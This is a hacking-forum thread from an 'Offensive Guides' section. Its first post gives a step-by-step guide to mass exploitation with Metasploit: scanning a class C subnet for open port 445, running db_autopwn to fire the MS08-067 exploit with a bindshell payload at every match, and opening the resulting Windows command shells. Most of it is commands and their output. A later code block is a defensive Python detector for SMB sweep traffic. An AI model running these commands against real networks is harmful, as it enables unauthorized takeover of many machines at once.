| Offensive Guides & Information This is where you can post your guides. |
#1
Metasploit Mass Exploitation for Dummies

[Thanks to HD Moore for making this brief guide]

One of the features added in the 3.2 release of the Metasploit Framework was the ability to restrict the db_autopwn command to specific ports and modules matching a given regular expression. This feature can be used to run one or more exploits against a specific range of hosts at the same time. In the example below, we will demonstrate how to launch the MS08-067 exploit against every host with port 445 open in a specific class C.

To get started, run msfconsole on a Linux machine running a recent Subversion snapshot of the Metasploit Framework (3.3-dev; although 3.2 will work as well), the sqlite3 Ruby gem, and a recent version of Nmap. Once the Metasploit prompt appears, use the load command to load the SQLite3 driver.

    msf > load db_sqlite3
    [*] Successfully loaded plugin: db_sqlite3

Next we will use the db_create command to initialize a new SQLite3 database and connect it to the Metasploit Framework instance:

    msf > db_create
    [*] The specified database already exists, connecting
    [*] Successfully connected to the database
    [*] File: /root/.msf3/sqlite3.db

To speed up our test, we will use db_nmap command with a very narrow set of search requirements. In this case, we want to find every machine with port 445 open on the target subnet. One of the quickest ways to accomplish this is by using the flag combination below:

    msf > db_nmap -sS -PS445 -p445 -n -T Aggressive AAA.BBB.CCC.0/24

Finally, we execute the db_autopwn command, with the -e option to specify exploitation, the -p option to specify port-based matching, the -b option to select the bindshell payload, and the -m option to only run modules with the string "ms08_067" in their name:

    msf > db_autopwn -e -p -b -m ms08_067

Once this command completes, we can use the sessions -l command to list the active shells. Use the sessions -i [SID] command to interact with a given session.

    msf > sessions -l

    Active sessions
    ===============

      Id  Description    Tunnel
      --  -----------    ------
      1   Command shell  AAA.BBB.CCC.11 -> AAA.BBB.CCC.86

    msf > sessions -i 1
    [*] Starting interaction with 1...

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>

Enjoy! ~ MaXe
__________________ Code: ____/____\_________________
\|/ | OMG IT'S TEH LEET STORY!! |
/*\ /\ -*- |______ ________/\_________|
// \\ / \ /|\ / \/ \ / \
/// \\\ / \ / \/ \
// \\ / \ / \o/ \ \
| | / \ / | \ \
___| |____/ \______/________/ \_______\_____\_________
/ o \
#"=-
/\
__________________________________________________________
On a mission, to find the lost member of Teh Unkwon.. |
|
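Seen from the network side, the db_nmap step in the guide above (-sS -PS445 -p445 across a /24) is one source sending bare SYNs to port 445 on many addresses of a single subnet within seconds. The detector below is an added example, not part of the original post or of Metasploit; the log format, thresholds and function names are assumptions, and the sample lines are constructed.

```python
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_network

def build_sample():
    """Constructed log lines 'ISO-time src dst dport tcp-flags' (assumed format);
    addresses are RFC 5737 documentation ranges, not real hosts."""
    base, lines = datetime(2009, 1, 1, 12, 0, 0), []
    for i in range(1, 41):  # one source, SYN to 40 hosts, 100 ms apart
        when = base + timedelta(milliseconds=100 * i)
        lines.append(f"{when.isoformat()} 198.51.100.7 192.0.2.{i} 445 S")
    for i in range(30):     # ordinary client talking to two file servers
        when = base + timedelta(seconds=i)
        lines.append(f"{when.isoformat()} 192.0.2.50 192.0.2.{200 + i % 2} 445 S")
    return lines + ["truncated line"]  # malformed input must be skipped

def find_smb_sweeps(lines, port=445, min_hosts=20, window=timedelta(seconds=60)):
    """Return {(src, dst /24): peak distinct-host count} for sources that sent
    bare SYNs to `port` on >= min_hosts addresses of one /24 within `window`."""
    events = defaultdict(list)  # (src, /24) -> [(time, dst), ...]
    for line in lines:
        parts = line.split()
        if len(parts) != 5 or parts[3] != str(port) or parts[4] != "S":
            continue
        ts, src, dst = parts[:3]
        try:
            key = (src, str(ip_network(f"{dst}/24", strict=False)))
            when = datetime.fromisoformat(ts)
        except ValueError:
            continue  # unparsable address or timestamp
        events[key].append((when, dst))
    alerts = {}
    for key, seen in events.items():
        seen.sort()
        start, in_window = 0, defaultdict(int)  # dst -> hits inside the window
        for when, dst in seen:
            in_window[dst] += 1
            while when - seen[start][0] > window:  # evict aged-out events
                old = seen[start][1]
                in_window[old] -= 1
                if in_window[old] == 0:
                    del in_window[old]
                start += 1
            if len(in_window) >= min_hosts:
                alerts[key] = max(alerts.get(key, 0), len(in_window))
    return alerts

if __name__ == "__main__":
    for (src, net), hosts in find_smb_sweeps(build_sample()).items():
        print(f"sweep: {src} -> {net} port 445, {hosts} hosts")
```

The client that keeps reconnecting to the same two file servers never trips the alert, because the count is of distinct destinations in the window rather than of connections.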
#2
| Re: Metasploit Mass Exploitation for Dummies
Indeed, it makes it a lot easier to make targeted mass exploitation!